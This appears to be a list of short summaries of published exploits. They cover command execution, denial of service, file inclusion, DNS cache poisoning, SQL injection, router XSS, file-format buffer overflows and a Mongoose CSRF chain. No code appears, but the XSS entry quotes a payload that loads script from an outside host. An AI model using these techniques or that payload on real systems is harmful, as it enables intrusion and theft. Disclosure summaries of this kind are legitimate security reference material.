This exploit allows an attacker to execute arbitrary commands on a Windows XP system by exploiting a vulnerability in the mSQL extension. The attacker can bind a TCP shell to a specific port and gain remote access to the target system.
This exploit targets the WFTPD Pro Server 3.21 and causes a Denial of Service (DoS) by sending a specially crafted MLST command. It fills the buffer with 'A's and sends the command repeatedly, increasing the size of the buffer each time. This exploit can crash the server and render it unavailable.
Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled.
This is a Python script that performs DNS cache poisoning. It is based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html. The script predicts the next transaction ID for DNS queries and attempts to poison the cache with malicious responses. The output of the script includes the time, IP, port, ID, query, number of good predicted IDs, and number of errors.
The vulnerability allows an attacker to extract user and admin login information. The exploit involves using a UNION SELECT statement to retrieve the username and password.
The CartWeaver application is vulnerable to SQL injection attacks in the Details.cfm page, specifically in the ProdID parameter. An attacker can manipulate the ProdID parameter to execute arbitrary SQL queries. This can lead to unauthorized access, disclosure of sensitive information, and potential compromise of the application and its data.
This exploit allows for persistent XSS on Intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.
The exploit takes advantage of a buffer overflow vulnerability in the .spr file format used in Live for Speed. With a specially crafted .spr file, an attacker can overwrite the EIP register and execute arbitrary code. This vulnerability is different from the previously discovered buffer overflow in .mpr files. The .spr files are stored in a separate folder and have a different file structure. The exploit code provided can be compiled using Dev C++ 4.9.9.2. Use caution when handling .spr files as they can be used for malicious purposes.
The vulnerability occurs in the Live for Speed .ply file format due to an overly long number plate string. By exploiting this issue, an attacker can execute malicious shellcode by convincing a user to put the .ply file inside their misc folder inside of Lfs2. The buffer overflow occurs when the number plate field is filled with over 1000 bytes.
Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visiting an attacker-controlled web page can execute system commands on the system hosting the Mongoose server. However, if the Mongoose web server is installed as a service, then executing programs, e.g. 'calc.exe', may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests, commands may become unstable when Mongoose is run as a service. When Mongoose is run in standard mode, attackers can potentially modify 'Mongoose.conf' and create arbitrary files on the server, like .PHP etc., to point Mongoose to this as its new 'index' file. Then you need to tell Mongoose its 'access_log_file' is the new attacker-generated file, after injecting commands into the Mongoose web server's log file that will get executed when the log file is later requested. This vulnerability requires a CGI interpreter to be already set, or some information about the target to be known, like the CGI path and language ('pl,php,cgi') used, so that we can set the correct programming language when the file is created during the initial CSRF attack.